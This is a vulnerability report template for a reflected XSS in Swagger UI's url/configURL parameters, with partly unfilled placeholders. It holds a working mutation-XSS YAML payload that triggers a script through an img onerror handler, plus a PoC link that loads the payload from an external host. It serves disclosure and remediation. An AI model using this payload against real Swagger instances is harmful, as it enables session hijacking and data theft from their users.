# Swagger Reflected XSS Vulnerability in "URL/configURL" Parameter on "Endpoint"
## Overview
Vulnerability Type: Reflected #Cross-Site Scripting (XSS)
Affected Component: Swagger UI
Location: [https://the-red.team/templates/swagger-xss](https://the-red.team/templates/swagger-xss)
Parameter: `URL/configURL`
Severity: Medium (6.1)
CVE ID: CVE-2016-1000229
CVSS: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

## Description
An XSS vulnerability has been identified in the Swagger UI component, specifically in its handling of YAML configuration files imported via the `url` and `configURL` parameters. This vulnerability arises due to inadequate input validation and sanitization of user-supplied data in the Swagger UI interface, allowing an attacker to inject and execute arbitrary JavaScript code within the context of a user's browser.

## Impact
If successfully exploited, this vulnerability could lead to various attacks, including but not limited to:
- Session hijacking
- Data theft
- Malicious code execution
- Defacement of the application

## Affected Versions:
- The vulnerability has been confirmed in the following versions:
Swagger UI 3.14.0 < 3.38.0

Other versions might also be affected, and it is recommended to assess all versions of the Swagger UI component.

# Recommendation:
To mitigate the risk associated with this vulnerability, the following actions are recommended:

1. Update: Apply the latest patches or updates provided by the vendor to address this vulnerability. (See [https://swagger.io/tools/swagger-ui/](https://swagger.io/tools/swagger-ui/))
2. Input Sanitization: Implement strict input validation and sanitization mechanisms to prevent malicious inputs from being processed.
3 .Content Security Policy (CSP): Enforce a robust CSP to restrict the execution of unauthorized scripts.
4. Security Headers: Configure appropriate security headers (e.g., X-XSS-Protection) to enhance browser security.
5. Regular Security Audits: Conduct regular security audits and penetration testing to identify and remediate vulnerabilities proactively.

# Steps to Reproduce:
The following steps demonstrate how an attacker could exploit this vulnerability:
1. Access the Swagger UI interface located at [vulnerable-url.com/swagger](vulnerable-url.com/swagger)
2. Access the payload using [https://the-red.team/poc/swagger-xss.yaml](https://the-red.team/poc/swagger-xss.yaml) or host the file below, making sure to set the proper headers so the endpoint can access it. 

``` yaml
swagger: '2.0'
info:
  title: Example yaml.spec
  description: |
    <math><mtext><option><FAKEFAKE><option></option><mglyph><svg><mtext><textarea><a title="</textarea><img src='#' onerror='alert(window.origin)'>">
paths:
  /accounts:
    get:
      responses:
        '200':
          description: No response was specified
      tags:
        - accounts
      operationId: findAccounts
      summary: Finds all accounts
``` #
3. Import a YAML configuration file using the "url" or "configURL" parameter.
4. Inject and submit a malicious JavaScript payload within the YAML file.
5. Observe if the payload gets executed within the context of the application.

# Proof of Concept (PoC):
Visit the following url to see that the script is executed: [https://test.test/swagger?url=https://the-red.team/poc/swagger-xss.yaml](https://test.test/swagger?url=https://the-red.team/poc/swagger-xss.yaml)

# Additional Information:
Vendor Advisory: [Link to vendor advisory, if available]
CVE Details: [Link to CVE details, if applicable]

Contact: [Your contact information]
Date Reported: [Date of reporting]
PoC YAML file: 

# References 
- [https://blog.vidocsecurity.com/blog/hacking-swagger-ui-from-xss-to-account-takeovers/](https://blog.vidocsecurity.com/blog/hacking-swagger-ui-from-xss-to-account-takeovers/)
- [https://the-red.team/poc/swagger-xss.yaml](https://the-red.team/poc/swagger-xss.yaml)
- [https://the-red.team/templates/swagger-xss](https://the-red.team/templates/swagger-xss)